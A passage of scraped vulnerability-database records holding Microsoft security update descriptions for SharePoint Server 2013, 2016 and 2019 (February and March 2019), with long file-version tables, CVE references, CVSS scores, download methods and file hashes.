groupboard.debug.js| | 16339| 16-Jan-19| 09:50 \ngroupboard.js| groupboard.js| | 9548| 16-Jan-19| 09:49 \ngroupeditempicker.debug.js| groupeditempicker.debug.js| | 21014| 16-Jan-19| 09:49 \ngip.js| groupeditempicker.js| | 12055| 16-Jan-19| 09:50 \nhierarchytaskslist.debug.js| hierarchytaskslist.debug.js| | 60796| 16-Jan-19| 09:50 \nhierarchytaskslist.js| hierarchytaskslist.js| | 20086| 16-Jan-19| 09:50 \nimglib.debug.js| imglib.debug.js| | 91322| 16-Jan-19| 09:49 \nimglib.js| imglib.js| | 53905| 16-Jan-19| 09:50 \ninit.debug.js| init.debug.js| | 626353| 16-Jan-19| 09:39 \ninit.js_0001| init.js| | 302970| 16-Jan-19| 09:50 \ninplview.debug.js| inplview.debug.js| | 155120| 16-Jan-19| 09:50 \ninplview.js| inplview.js| | 79289| 16-Jan-19| 09:49 \njsgrid.debug.js| jsgrid.debug.js| | 1185607| 16-Jan-19| 09:49 \njsgrid.gantt.debug.js| jsgrid.gantt.debug.js| | 110109| 16-Jan-19| 09:50 \njsgrid.gantt.js| jsgrid.gantt.js| | 42304| 16-Jan-19| 09:50 \njsgrid.js| jsgrid.js| | 444679| 16-Jan-19| 09:49 \nlanguagepickercontrol.js| languagepickercontrol.js| | 11516| 16-Jan-19| 09:50 \nlistview.debug.js| listview.debug.js| | 930411| 16-Jan-19| 09:49 \nlistview.js| listview.js| | 399997| 16-Jan-19| 09:50 \nmapviewtemplate.debug.js| mapviewtemplate.debug.js| | 38394| 16-Jan-19| 09:50 \nmapviewtemplate.js| mapviewtemplate.js| | 15542| 16-Jan-19| 09:49 \nmenu.debug.js| menu.debug.js| | 103516| 16-Jan-19| 09:50 \nmenu.js_0001| menu.js| | 52559| 16-Jan-19| 09:50 \nmountpt.debug.js| mountpoint.debug.js| | 13632| 16-Jan-19| 09:50 \nmountpt.js| mountpoint.js| | 6211| 16-Jan-19| 09:50 \nmquery.debug.js| mquery.debug.js| | 60340| 16-Jan-19| 09:50 \nmquery.js| mquery.js| | 22614| 16-Jan-19| 09:49 \nms.rte.debug.js| ms.rte.debug.js| | 714303| 16-Jan-19| 09:50 \nms.rte.js| ms.rte.js| | 401119| 16-Jan-19| 09:50 \noffline.debug.js| offline.debug.js| | 22145| 16-Jan-19| 09:50 \noffline.js| offline.js| | 11374| 16-Jan-19| 09:49 \nows.debug.js| ows.debug.js| | 714077| 16-Jan-19| 09:50 \nows.js| ows.js| | 376870| 16-Jan-19| 09:50 \nowsbrows.debug.js| owsbrows.debug.js| | 24730| 16-Jan-19| 09:50 \nowsbrows.js| owsbrows.js| | 13191| 16-Jan-19| 09:49 \npickerhierarchycontrol.js| pickerhierarchycontrol.js| | 84676| 16-Jan-19| 09:50 \nquicklaunch.debug.js| quicklaunch.debug.js| | 135522| 16-Jan-19| 09:49 \nquicklaunch.js| quicklaunch.js| | 74048| 16-Jan-19| 09:50 \nradiobuttonwithchildren.js| radiobuttonwithchildren.js| | 3555| 16-Jan-19| 09:50 \nroamingapps.debug.js| roamingapps.debug.js| | 55031| 16-Jan-19| 09:50 \nroamingapps.js| roamingapps.js| | 21853| 16-Jan-19| 09:49 \nsharing.debug.js| sharing.debug.js| | 322361| 16-Jan-19| 09:50 \nsharing.js| sharing.js| | 135348| 16-Jan-19| 09:49 \nsharingmodern.debug.js| sharingmodern.debug.js| | 18196| 16-Jan-19| 09:50 \nsharingmodern.js| sharingmodern.js| | 5805| 16-Jan-19| 09:50 \nsinglesignon.debug.js| singlesignon.debug.js| | 17059| 16-Jan-19| 09:50 \nsinglesignon.js| singlesignon.js| | 6060| 16-Jan-19| 09:49 \nsiteupgrade.debug.js| siteupgrade.debug.js| | 1693| 16-Jan-19| 09:50 \nsiteupgrade.debug.js_14| siteupgrade.debug.js| | 1693| 16-Jan-19| 09:50 \nsiteupgrade.js| siteupgrade.js| | 1119| 16-Jan-19| 09:49 \nsiteupgrade.js_14| siteupgrade.js| | 1119| 16-Jan-19| 09:49 \nsp.accessibility.debug.js| sp.accessibility.debug.js| | 34811| 16-Jan-19| 09:50 \nsp.accessibility.js| sp.accessibility.js| | 21841| 16-Jan-19| 09:50 \nsp.core.debug.js| sp.core.debug.js| | 165966| 16-Jan-19| 09:38 \nsp.core.js| sp.core.js| | 87861| 16-Jan-19| 09:49 \nsp.datetimeutil.debug.js| sp.datetimeutil.debug.js| | 113759| 16-Jan-19| 09:50 \nsp.datetimeutil.js| sp.datetimeutil.js| | 65481| 16-Jan-19| 09:49 \nsp.debug.js| sp.debug.js| | 1706283| 16-Jan-19| 09:50 \nsp.exp.debug.js| sp.exp.debug.js| | 41182| 16-Jan-19| 09:50 \nsp.exp.js| sp.exp.js| | 24498| 16-Jan-19| 09:50 \nsp.init.debug.js| sp.init.debug.js| | 57831| 16-Jan-19| 09:49 \nsp.init.js| sp.init.js| | 32952| 16-Jan-19| 09:50 \nsp.js| sp.js| | 1044861| 16-Jan-19| 09:50 \nspmap.debug.js| sp.map.debug.js| | 15759| 16-Jan-19| 09:50 \nspmap.js| sp.map.js| | 8531| 16-Jan-19| 09:49 \nsppageinstr.debug.js| sp.pageinstrumentation.debug.js| | 1925| 16-Jan-19| 09:50 \nsppageinstr.js| sp.pageinstrumentation.js| | 1395| 16-Jan-19| 09:49 \nsp.requestexecutor.debug.js| sp.requestexecutor.debug.js| | 100405| 16-Jan-19| 09:49 \nsp.requestexecutor.js| sp.requestexecutor.js| | 63696| 16-Jan-19| 09:50 \nsp.ribbon.debug.js| sp.ribbon.debug.js| | 361474| 16-Jan-19| 09:50 \nsp.ribbon.js| sp.ribbon.js| | 222917| 16-Jan-19| 09:49 \nsp.runtime.debug.js| sp.runtime.debug.js| | 197022| 16-Jan-19| 09:38 \nsp.runtime.js| sp.runtime.js| | 115684| 16-Jan-19| 09:50 \nsp.simpleloggermobile.debug.js| sp.simpleloggermobile.debug.js| | 40931| 16-Jan-19| 09:50 \nsp.simpleloggermobile.js| sp.simpleloggermobile.js| | 20442| 16-Jan-19| 09:50 \nsp.storefront.debug.js| sp.storefront.debug.js| | 440500| 16-Jan-19| 09:50 \nsp.storefront.js| sp.storefront.js| | 296736| 16-Jan-19| 09:50 \nsp.ui.admin.debug.js| sp.ui.admin.debug.js| | 18904| 16-Jan-19| 09:50 \nsp.ui.admin.js| sp.ui.admin.js| | 11611| 16-Jan-19| 09:50 \nsp.ui.allapps.debug.js| sp.ui.allapps.debug.js| | 45304| 16-Jan-19| 09:50 \nsp.ui.allapps.js| sp.ui.allapps.js| | 27972| 16-Jan-19| 09:50 \nsp.ui.applicationpages.calendar.debug.js| sp.ui.applicationpages.calendar.debug.js| | 278348| 16-Jan-19| 09:50 \nsp.ui.applicationpages.calendar.js| sp.ui.applicationpages.calendar.js| | 143407| 16-Jan-19| 09:50 \nsp.ui.applicationpages.debug.js| sp.ui.applicationpages.debug.js| | 11283| 16-Jan-19| 09:49 \nsp.ui.applicationpages.js| sp.ui.applicationpages.js| | 7682| 16-Jan-19| 09:50 \nsp.ui.bdcadminpages.debug.js| sp.ui.bdcadminpages.debug.js| | 16634| 16-Jan-19| 09:50 \nsp.ui.bdcadminpages.js| sp.ui.bdcadminpages.js| | 11650| 16-Jan-19| 09:50 \nspblogd.js| sp.ui.blogs.debug.js| | 51882| 16-Jan-19| 09:50 \nspblog.js| sp.ui.blogs.js| | 31202| 16-Jan-19| 09:50 \nsp.ui.combobox.debug.js| sp.ui.combobox.debug.js| | 100153| 16-Jan-19| 09:49 \nsp.ui.combobox.js| sp.ui.combobox.js| | 52056| 16-Jan-19| 09:49 \nsp.ui.controls.debug.js| sp.ui.controls.debug.js| | 58556| 16-Jan-19| 09:50 \nsp.ui.controls.js| sp.ui.controls.js| | 39727| 16-Jan-19| 09:50 \nsp.ui.dialog.debug.js| sp.ui.dialog.debug.js| | 75579| 16-Jan-19| 09:49 \nsp.ui.dialog.js| sp.ui.dialog.js| | 44112| 16-Jan-19| 09:49 \nspdiscd.js| sp.ui.discussions.debug.js| | 136669| 16-Jan-19| 09:50 \nspdisc.js| sp.ui.discussions.js| | 81745| 16-Jan-19| 09:50 \nspimgcd.js| sp.ui.imagecrop.debug.js| | 28399| 16-Jan-19| 09:50 \nspimgc.js| sp.ui.imagecrop.js| | 28399| 16-Jan-19| 09:50 \nspui_rid.js| sp.ui.relateditems.debug.js| | 29224| 16-Jan-19| 09:49 \nspui_ri.js| sp.ui.relateditems.js| | 18376| 16-Jan-19| 09:50 \nsp.ui.rte.debug.js| sp.ui.rte.debug.js| | 355959| 16-Jan-19| 09:49 \nsp.ui.rte.js| sp.ui.rte.js| | 217944| 16-Jan-19| 09:50 \nsp.ui.tileview.debug.js| sp.ui.tileview.debug.js| | 100921| 16-Jan-19| 09:50 \nsp.ui.tileview.js| sp.ui.tileview.js| | 61800| 16-Jan-19| 09:50 \nspui_tld.js| sp.ui.timeline.debug.js| | 488181| 16-Jan-19| 09:50 \nspui_tl.js| sp.ui.timeline.js| | 265637| 16-Jan-19| 09:49 \nspgantt.debug.js| spgantt.debug.js| | 192623| 16-Jan-19| 09:50 \nspgantt.js| spgantt.js| | 69725| 16-Jan-19| 09:50 \nspgridview.debug.js| spgridview.debug.js| | 7876| 16-Jan-19| 09:50 \nspgridvw.js| spgridview.js| | 4901| 16-Jan-19| 09:49 \nstart.debug.js| start.debug.js| | 185210| 16-Jan-19| 09:50 \nstart.js| start.js| | 101322| 16-Jan-19| 09:50 \nsuitelinks.debug.js| suitelinks.debug.js| | 32319| 16-Jan-19| 09:49 \nsuitelnk.js| suitelinks.js| | 13506| 16-Jan-19| 09:50 \ntimecard.debug.js| timecard.debug.js| | 37455| 16-Jan-19| 09:50 \ntimecard.js| timecard.js| | 21190| 16-Jan-19| 09:50 \nwpadder.debug.js| wpadder.debug.js| | 52865| 16-Jan-19| 09:50 \nwpadder.js| wpadder.js| | 33268| 16-Jan-19| 09:50 \nwpcm.debug.js| wpcm.debug.js| | 7521| 16-Jan-19| 09:50 \nwpcm.js| wpcm.js| | 3847| 16-Jan-19| 09:49 \nstore.xml| store.xml| | 8913339| 16-Jan-19| 09:47 \nstoreazure.xml| store_azure.xml| | 8913339| 16-Jan-19| 09:48 \nappassoc.asx| applicationassociations.aspx| | 5504| 16-Jan-19| 09:56 \nauthen.asx| authentication.aspx| | 13965| 16-Jan-19| 09:56 \nblkftyp.asx| blockedfiletype.aspx| | 4282| 16-Jan-19| 09:56 \ndftcntdb.asx| defaultcontentdb.aspx| | 6243| 16-Jan-19| 09:57 \nhealrepo.asx| healthreport.aspx| | 6499| 16-Jan-19| 09:57 \nincemail.asx| incomingemail.aspx| | 22663| 16-Jan-19| 09:57 \nirmadmin.asx| irmadmin.aspx| | 8804| 16-Jan-19| 09:57 \nlogusage.asx| logusage.aspx| | 14555| 16-Jan-19| 09:56 \nmetrics.asx| metrics.aspx| | 15403| 16-Jan-19| 09:57 \nofadmin.asx| officialfileadmin.aspx| | 13839| 16-Jan-19| 09:56 \nprivacy.asx| privacy.aspx| | 10182| 16-Jan-19| 09:57 \nslctcfaz.asx| selectcrossfirewallaccesszone.aspx| | 5643| 16-Jan-19| 09:56 \nsvcappcn.asx| serviceapplicationconnect.aspx| | 5027| 16-Jan-19| 09:56 \nsiteex.asx| siteandlistexport.aspx| | 12538| 16-Jan-19| 09:57 \nsitebaks.asx| sitebackuporexportstatus.aspx| | 10389| 16-Jan-19| 09:56 \nsitecbac.asx| sitecollectionbackup.aspx| | 10764| 16-Jan-19| 09:57 \nsitequot.asx| sitequota.aspx| | 24455| 16-Jan-19| 09:56 \nspscrstg.asx_0002| spsecuritysettings.aspx| | 7731| 16-Jan-19| 09:57 \nunatcdb.asx| unattacheddbselect.aspx| | 6322| 16-Jan-19| 09:57 \nuser_solution.asx| usersolutions.aspx| | 9571| 16-Jan-19| 09:56 \nversions.asx| versions.aspx| | 37378| 16-Jan-19| 09:57 \nofadmin.aspx_tenantadmin| ta_officialfileadmin.aspx| | 11593| 16-Jan-19| 09:39 \nmicrosoft.vroom.sharepoint.dll| microsoft.vroom.sharepoint.dll| 16.0.10341.20000| 631952| 16-Jan-19| 09:56 \nstswel.dll| stswel.dll| 16.0.10341.20000| 3681632| 16-Jan-19| 09:51 \nstswfacb.dll| microsoft.sharepoint.workflowactions.dll| 16.0.10341.20000| 320672| 16-Jan-19| 09:42 \nstswfact.dll| microsoft.sharepoint.workflowactions.dll| 16.0.10341.20000| 320672| 16-Jan-19| 09:42 \nsts.workflows.dll| microsoft.sharepoint.workflows.dll| 16.0.10341.20000| 73872| 16-Jan-19| 09:54 \nie50up.debug.js| ie50up.debug.js| | 155104| 16-Jan-19| 09:52 \nie50up.js| ie50up.js| | 81713| 16-Jan-19| 09:52 \nie55up.debug.js| ie55up.debug.js| | 154298| 16-Jan-19| 09:52 \nie55up.js| ie55up.js| | 81174| 16-Jan-19| 09:52 \nnon_ie.debug.js| non_ie.debug.js| | 102961| 16-Jan-19| 09:52 \nnon_ie.js| non_ie.js| | 60386| 16-Jan-19| 09:52 \nbpstd.debug.js| bpstd.debug.js| | 8194| 16-Jan-19| 09:48 \nbpstd.js| bpstd.js| | 4666| 16-Jan-19| 09:48 \nctp.debug.js| ctp.debug.js| | 7940| 16-Jan-19| 09:48 \nctp.js| ctp.js| | 4221| 16-Jan-19| 09:47 \ncvtp.debug.js| cvtp.debug.js| | 5066| 16-Jan-19| 09:48 \ncvtp.js| cvtp.js| | 2702| 16-Jan-19| 09:48 \nitp.debug.js| itp.debug.js| | 13120| 16-Jan-19| 09:47 \nitp.js| itp.js| | 9812| 16-Jan-19| 09:48 \nxtp.debug.js| xtp.debug.js| | 3605| 16-Jan-19| 09:48 \nxtp.js| xtp.js| | 1799| 16-Jan-19| 09:47 \nosrv_sandbox.dll| microsoft.office.server.sandbox.dll| 16.0.10341.20000| 769416| 16-Jan-19| 09:31 \nmicrosoft.office.web.sandbox.dll| microsoft.office.web.sandbox.dll| 16.0.10341.20000| 769200| 16-Jan-19| 09:31 \nsts_sandbox.dll| microsoft.sharepoint.sandbox.dll| 16.0.10341.20000| 769408| 16-Jan-19| 09:30 \nvisfilt.dll.x64| visfilt.dll| 16.0.10341.20000| 6398088| 16-Jan-19| 09:49 \nvisioserver.vutils.dll| vutils.dll| 16.0.10341.20000| 3238488| 16-Jan-19| 09:57 \nsts_odspnextnewux1efa61166de43c71668b949c99f0686b| listitemformdeferred.js| | 2257106| 17-Jan-19| 02:50 \nsts_odspnextnewuxbe3313501487c79fe05e26c262deaaa9| createsite.json| | 43508| 17-Jan-19| 02:50 \nsts_odspnextnewux73bf67ca708ed0b9bbee05da7d4ab95b| listitemform.json| | 178730| 17-Jan-19| 02:50 \nodbonedrive.json| odbonedrive.json| | 359240| 17-Jan-19| 02:50 \nsts_odspnextnewux0caa67c96a8a488d88a0b64e58cf6219| recyclebin.json| | 181108| 17-Jan-19| 02:50 \nsts_odspnextnewux82ec74261e20424f9653d60d8846afce| sitehub.json| | 223233| 17-Jan-19| 02:50 \nsts_odspnextnewuxc2feb86763199de55a499729d395cb83| splist.json| | 299043| 17-Jan-19| 02:50 \nsts_odspnextnewux8c0380eb9a20542616b7c1feeac0f995| odbonedrive.js| | 678219| 17-Jan-19| 02:50 \nsts_odspnextnewuxee5697f761f94ca16ffd86a4ef02d1a8| recyclebindeferred.js| | 2822614| 17-Jan-19| 02:50 \nsts_odspnextnewuxb8931dbbdb97beb330defb6bad1ae332| sitehubdeferred.js| | 2414362| 17-Jan-19| 02:50 \nsts_odspnextnewux75199cdb9d900d5ff11f7782399cb17f| splistdeferred.js| | 2280032| 17-Jan-19| 02:50 \nsts_odspnextnewux30484b0717864b439efabcb4caaf6538| spoapp.js| | 272957| 17-Jan-19| 02:50 \nsts_odspnextnewuxb680d3a8e2013810dae29dafe4d75340| spofiles.js| | 610823| 17-Jan-19| 02:50 \ncui.debug.js| cui.debug.js| | 657986| 16-Jan-19| 09:55 \ncui.js| cui.js| | 364464| 16-Jan-19| 09:54 \nxui.debug.js| xui.debug.js| | 45549| 16-Jan-19| 09:54 \nxui.js| xui.js| | 18952| 16-Jan-19| 09:55 \nwac.word.sword.dll| sword.dll| 16.0.10341.20000| 12803176| 16-Jan-19| 09:58 \nwdsrv.conversion.sword.dll| sword.dll| 16.0.10341.20000| 12803176| 16-Jan-19| 09:58 \ntranslationqueue.sql| translationqueue.sql| | 53164| 16-Jan-19| 09:54 \nifswfe.dll| microsoft.office.infopath.server.dll| 16.0.10341.20000| 3183728| 16-Jan-19| 09:30 \nifswfepriv.dll| microsoft.office.infopath.server.dll| 16.0.10341.20000| 3183728| 16-Jan-19| 09:30 \noffxml.dll| offxml.dll| 16.0.10341.20000| 427648| 16-Jan-19| 09:51 \n \nHow to get help and support for this security updateHelp for installing updates: [Protect yourself online](<https://www.microsoft.com/safety/pc-security/updates.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Security](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-02-12T00:00:00", "type": "mskb", "title": "Description of the security update for SharePoint Server 2019: February 12, 2019", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0594", "CVE-2019-0604"], "modified": "2019-02-12T00:00:00", "id": "KB4462171", "href": "https://support.microsoft.com/en-us/help/4462171", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T09:34:13", "description": "None\n## Summary\n\nThis security update resolves a cross\u2013site-scripting (XSS) vulnerability if Microsoft SharePoint Server does not correctly sanitize a specially crafted web request to an affected SharePoint server. To learn more about the vulnerability, see Microsoft Common Vulnerabilities and Exposures [CVE-2019-0778](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0778>) and [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>). \n \n**Note** To apply this security update, you must have the release version of Microsoft SharePoint Enterprise Server 2016 installed.This public update delivers Feature Pack 2 for SharePoint Server 2016. Feature Pack 2 contains the following feature:\n\n * SharePoint Framework (SPFx)\nThis public update also delivers all the features that were included in Feature Pack 1 for SharePoint Server 2016, including:\n * Administrative Actions Logging\n * MinRole enhancements\n * SharePoint Custom Tiles\n * Hybrid Auditing (preview)\n * Hybrid Taxonomy\n * OneDrive API for SharePoint on-premises\n * OneDrive for Business modern user experience (available to Software Assurance customers)\nThe OneDrive for Business modern user experience requires an active Software Assurance contract at the time that the experience is enabled, either by installation of the public update or by manual enablement. If you don't have an active Software Assurance contract at the time of enablement, you must turn off the OneDrive for Business modern user experience.For more information, see the following Microsoft Docs articles:\n * [New features included in the November 2016 Public Update for SharePoint Server 2016 (Feature Pack 1)](<https://go.microsoft.com/fwlink/?linkid=832679>)\n * [New features included in the September 2017 Public Update for SharePoint Server 2016 (Feature Pack 2)](<https://go.microsoft.com/fwlink/?linkid=856819>)\n\n## Improvements and fixes\n\nMakes the following improvement in SharePoint Server 2016:\n\n * Adds support for the new Japan era in SharePoint Server 2016\nContains fixes for the following nonsecurity issues in SharePoint Server 2016:\n * Enforces setting the SharePoint database compatibility level to 110 to avoid high CPU use when you use Microsoft SQL Server 2017 in the SharePoint farm.\n * Fixes issues that affect the SharePoint Properties pane if the title or name of a document contain special characters in a document library.\n * When you use the modern UI experience in OneDrive for Business on a computer that has a low resolution, you experience navigation issues on the OneDrive home page. For example, the navigation area on the left and the hamburger button are not displayed.\n * Drag-and-drop operations for folders in a document library don't work. This issue occurs if you access the document library through the Chrome browser and the document library displays a managed metadata column.\n * Sometimes, SharePoint Server 2016 users can't be redirected to OneDrive for Business in SharePoint Online even if the hybrid OneDrive for Business feature is enabled.\n * Property demotion doesn't work for Word documents that contain ink objects.\n * Property demotion corrupts data of the Office Mix Add-in for PowerPoint.\nContains a fix for the following nonsecurity issue in Project Server 2016:\n * Editing a project-level custom field while on a project detail page (PDP) causes lost task-level calculated custom field values if the field formula includes the task's Unique ID.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4462211>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download security update 4462211 for the 64-bit version of SharePoint Enterprise Server 2016](<http://www.microsoft.com/download/details.aspx?familyid=d7a12d15-0230-487d-a2cf-ceb50a424559>)\n\n## More Information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: March 12, 2019](<https://support.microsoft.com/en-us/help/20190312>).\n\n### Security update replacement information\n\nThis security update replaces the previously released update [4462155](<https://support.microsoft.com/help/4462155>).\n\n### File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nsts2016-kb4462211-fullfile-x64-glb.exe| D3B1E3DC58921E9EDFBA80FCD953DD01671A8212| BCB577C8B10CE7C9725F4191A0A82B6F904C758E59B8E3C640531531A8BF155C \n \nFile informationDownload the [list of files that are included in security update KB 4462211](<http://download.microsoft.com/download/9/7/8/978A75E9-BE30-4C87-A7B3-5171623C5CF2/4462211.csv>).\n\n## How to get help and support for this security update\n\nHelp for installing updates: [Protect yourself online](<https://www.microsoft.com/safety/pc-security/updates.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Security](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-03-12T00:00:00", "type": "mskb", "title": "Description of the security update for SharePoint Enterprise Server 2016: March 12, 2019", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2019-0778"], "modified": "2019-03-12T00:00:00", "id": "KB4462211", "href": "https://support.microsoft.com/en-us/help/4462211", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T09:34:01", "description": "None\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures CVE-2019-0594](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0594>), [Microsoft Common Vulnerabilities and Exposures CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), and [Microsoft Common Vulnerabilities and Exposures CVE-2019-0670](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0670>). \n \n**Note** To apply this security update, you must have the release version of [Service Pack 1 for Microsoft SharePoint Foundation 2013](<http://support.microsoft.com/kb/2880551>) installed.\n\n## Improvements and fixes\n\nThis security update makes improvements to enable the new Japanese era in SharePoint Foundation 2013 when it becomes available.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4462143>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download security update KB 4462143 for the 64-bit version of SharePoint Foundation 2013](<http://www.microsoft.com/download/details.aspx?familyid=7a78892a-d8d2-4154-871d-22dde393be2a>)\n\n## More Information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: February 12, 2019](<https://support.microsoft.com/en-us/help/20190212>).\n\n### Security update replacement information\n\nThis security update replaces the previously released security update [4461596](<https://support.microsoft.com/help/4461596>).\n\n### File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nsts2013-kb4462143-fullfile-x64-glb.exe| E3E0758EAA4920868E32636728E4FF5839426233| 2A2E7D7A6D4A4413437CA7B532F91BF906B03B4D4A93B5D2BD4D6F443895952C \n \nFile informationThe English (United States) version of this software update installs files that have the attributes that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.\n\n## \n\n__\n\nFor all supported x64-based versions of SharePoint Foundation 2013\n\nFile identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nmicrosoft.cobaltcore.dll| microsoft.cobaltcore.dll| 15.0.4991.1000| 1211112| 27-Jan-19| 11:05 \ncsisrv.dll| csisrv.dll| 15.0.5111.1000| 1417296| 27-Jan-19| 11:06 \ncsisrvexe.exe| csisrvexe.exe| 15.0.5085.1000| 210512| 27-Jan-19| 11:06 \nonfda.dll| onfda.dll| 15.0.5111.1000| 2158368| 27-Jan-19| 11:06 \njsapiextensibilitymanager.debug.js| jsapiextensibilitymanager.debug.js| | 20163| 27-Jan-19| 11:06 \nganttsharepointapishim.generated.debug.js| ganttapishim.generated.debug.js| | 6812| 27-Jan-19| 11:06 \nganttsharedapi.generated.debug.js| ganttsharedapi.generated.debug.js| | 4617| 27-Jan-19| 11:06 \ntimelinesharepointapishim.generated.debug.js| timelineapishim.generated.debug.js| | 1842| 27-Jan-19| 11:06 \ntimelinesharedapi.generated.debug.js| timelinesharedapi.generated.debug.js| | 3420| 27-Jan-19| 11:06 \nmsoidclil.dll| msoidclil.dll| 7.250.4556.0| 1446248| 27-Jan-19| 10:46 \nmsoidclil.dll.x64| msoidclil.dll| 7.250.4556.0| 1446248| 27-Jan-19| 11:04 \nmsoidres.dll| msoidres.dll| 7.250.4556.0| 830864| 27-Jan-19| 10:46 \nmsoidres.dll.x64| msoidres.dll| 7.250.4556.0| 830864| 27-Jan-19| 11:04 \nmsoidclil.dll| msoidclil.dll| 7.250.4556.0| 1220456| 27-Jan-19| 10:46 \nmsoidclil.dll.x86| msoidclil.dll| 7.250.4556.0| 1220456| 27-Jan-19| 10:46 \nmsoidres.dll| msoidres.dll| 7.250.4556.0| 830864| 27-Jan-19| 10:46 \nmsoidres.dll.x86| msoidres.dll| 7.250.4556.0| 830864| 27-Jan-19| 10:46 \ncompat.bro| compat.browser| | 14781| 27-Jan-19| 11:06 \nmicrosoft.naturallanguage.keywordextraction.resources.en.dll| microsoft.naturallanguage.keywordextraction.resources.dll| 15.0.5051.1000| 2752832| 27-Jan-19| 11:05 \ndevdash15.png| devdash15.png| | 699| 30-Jan-19| 02:28 \ndevsitegettingstarted.png| devsitegettingstarted.png| | 4798| 30-Jan-19| 02:28 \ngettingstarted.png| gettingstarted.png| | 4260| 30-Jan-19| 02:28 \ngettingstartedwithappcatalogsite.png| gettingstartedwithappcatalogsite.png| | 1518| 30-Jan-19| 02:28 \nspcommon.png| spcommon.png| | 19434| 30-Jan-19| 02:28 \nspimn.png| spimn.png| | 4248| 30-Jan-19| 02:28 \nspnav.png| spnav.png| | 651| 30-Jan-19| 02:28 \nsproaming.png| sproaming.png| | 8717| 30-Jan-19| 02:28 \nspstorefront.png| spstorefront.png| | 4785| 30-Jan-19| 02:28 \nspstorefrontbkg.png| spstorefrontbkg.png| | 239| 30-Jan-19| 02:28 \nacatrb16.png| stsappcatalogribbon16x16.png| | 475| 30-Jan-19| 02:28 \nacatrb32.png| stsappcatalogribbon32x32.png| | 790| 